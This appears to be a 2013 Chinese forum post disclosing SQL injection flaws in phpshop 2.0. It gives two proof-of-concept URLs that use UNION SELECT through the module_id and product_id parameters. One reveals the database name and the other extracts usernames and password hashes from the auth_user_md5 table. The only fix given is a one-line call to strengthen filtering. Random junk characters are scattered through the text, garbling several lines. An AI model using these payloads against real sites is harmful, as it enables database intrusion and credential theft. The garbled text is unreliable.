标题 : phpshop 2.0 SQL Injection Vulnerability/ q6 Y! N( i" [! V
$ w0 b0 \ d+ f% q c
作者 : By onestree& Q2 l i/ a# b5 Q R
下载地址 : http://code.google.com/p/phpshop/downloads/list
2 m- R# I8 g6 E& ~( U) S+ V6 |7 z测试地址: windows 7 / ubuntu( [/ x) |) x6 Z0 W3 I! O J& H
, d9 j+ A) Q8 L5 d5 Z" V9 _5 ?0 T, b
. b6 E, F, @0 e3 t X* O
SQLi p0c:
% a8 [$ E9 V) _9 { 2 t6 I4 u( v% `4 _" \& ^
==================2 L, ?. k4 b G& W( B& e$ A
1 Q6 E9 a- W: J3 P% l6 h6 O3 Z! rhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'- N# o/ D9 O# {) L7 y" `0 w
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
3 p: J& Q: l0 p' b
' X" j* E1 ]: {. Y- L0 k5 }+ c6 jhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--7 z5 T: K0 X9 V% _7 Z# @" J
2 C0 V5 ]/ f X- w9 H; M$ j修复:
1 i7 K9 k7 a7 I! B: M加强过滤
: P# P, H& ^5 z8 g4 y; l8 F, W8 u- L" w$ o1 Y
+ I! H* k2 z* L0 Z |
发表于 2013-1-18 18:24:10
收藏
支持
反对